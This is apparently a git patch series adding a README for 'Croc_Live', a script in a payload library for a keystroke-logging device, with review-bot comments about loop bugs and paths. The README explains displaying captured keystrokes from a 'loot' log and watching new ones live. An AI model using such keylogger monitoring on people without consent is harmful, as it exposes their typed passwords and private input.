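Review bot: dropping the `grep`/`sed` tail in the @@ -382,7 +426,7 hunk makes the `until` condition depend on `tcpdump`'s own exit status, which is 0 as soon as one matching packet is captured, so the loop now runs exactly once and the busy-spin only remains for the error case (for example `wlan0` down). `icmp_alert` still omits the `-i wlan0` that `port_alert` passes; both should capture on the same interface.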
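Review bot: `croc_live.sh` in PATCH 7/9 waits with `until [ -f loot/croc_char.log ]; do echo -ne ...; done`, which has no `sleep`, so it spins at full CPU rewriting the same line until the file appears; add `sleep 1` in the loop. Both `find . -type f -name "croc_char.log"` and `loot/croc_char.log` are relative to the caller's current directory, so the script only works when started from the directory above `loot/` (the header says `bash udisk/tools/croc_live.sh`); use absolute paths or `cd` there at the top. When `loot/croc_char.log` already exists, `find` prints it under "Previous keystrokes" and `tail -f` then prints its last lines again.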
From: spywill Date: Tue, 1 Aug 2023 08:24:12 -0400 Subject: [PATCH 8/9] Create README.md --- payloads/library/general/Croc_Live/README.md | 1 + 1 file changed, 1 insertion(+) create mode 100644 payloads/library/general/Croc_Live/README.md diff --git a/payloads/library/general/Croc_Live/README.md b/payloads/library/general/Croc_Live/README.md new file mode 100644 index 0000000..8b13789 --- /dev/null +++ b/payloads/library/general/Croc_Live/README.md @@ -0,0 +1 @@ + From bd918cb98e457149fa073c1732e4bc5f2fe4d3cf Mon Sep 17 00:00:00 2001 From: spywill Date: Tue, 1 Aug 2023 08:25:10 -0400 Subject: [PATCH 9/9] Update README.md --- payloads/library/general/Croc_Live/README.md | 28 ++++++++++++++++++++ 1 file changed, 28 insertions(+) diff --git a/payloads/library/general/Croc_Live/README.md b/payloads/library/general/Croc_Live/README.md index 8b13789..89320fe 100644 --- a/payloads/library/general/Croc_Live/README.md +++ b/payloads/library/general/Croc_Live/README.md 
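Review bot: PATCH 8/9 creates `README.md` with a single empty line and PATCH 9/9 immediately replaces it (`@@ -1 +1,29 @@`); squash the two so the history does not carry an empty file.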
@@ -1 +1,29 @@ +# Croc_Live +Script Description: Keyboard Activity Monitor + +The following script serves as a tool to monitor and display keyboard activity, showing both previous keystrokes and live keystrokes in real-time. It operates in the terminal environment and relies on the presence of certain log files. + +- Display Previous Keystrokes: + - The script initiates by printing a message to the terminal, indicating that the previously recorded keystrokes are about to be displayed. + - It then searches for files named "croc_char.log" within the current directory and its subdirectories. + - All found log files are concatenated and their contents are displayed, revealing the previous keystrokes recorded in those files. + +- Waiting for Keyboard Activity: + - After displaying the previous keystrokes, the script enters a loop, continuously checking for the existence of the file "loot/croc_char.log". + - During this loop, it prints the message "Waiting for keyboard activity" and clears the line with each iteration. This creates an interactive waiting experience for users until keyboard activity is detected. + +- Show Live Keystrokes: + - Once the file "loot/croc_char.log" is present (indicating keyboard activity has started), the script proceeds. + - A 1-second pause occurs to allow time for the system to update or log any new keyboard activity. + - The terminal screen is then cleared to prepare for the display of live keystrokes. + - A message is shown to inform users that live keystrokes will be displayed. + - The script uses the tail -f command, which continuously follows and outputs new content appended to the "loot/croc_char.log" file. This effectively presents live keystrokes in real-time. + +- Usage: + +Place the croc_live.sh file in keycroc tools folder. + +To utilize this script, simply execute it in the terminal environment. 
Make sure that the required log files, specifically "croc_char.log" and "loot/croc_char.log," are available and accessible within the current directory. Simply type "bash udisk/tools/croc_live.sh" in terminal. + +Please note that this script may have specific use cases, such as monitoring and capturing keyboard activity during specific sessions or tasks. Always ensure you have the necessary permissions to read and access the log files being monitored.
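Review bot: the Usage section of the @@ -1 +1,29 @@ hunk says both `croc_char.log` and `loot/croc_char.log` must already be available, but the "Waiting for Keyboard Activity" section above it (and the script's `until [ -f loot/croc_char.log ]` loop) describe waiting until that file appears, so it need not exist beforehand; reword to say the script waits for it. The text also says to place the file in the tools folder and run `bash udisk/tools/croc_live.sh`, which only works from the directory that contains both `loot/` and `udisk/`; state that working directory explicitly.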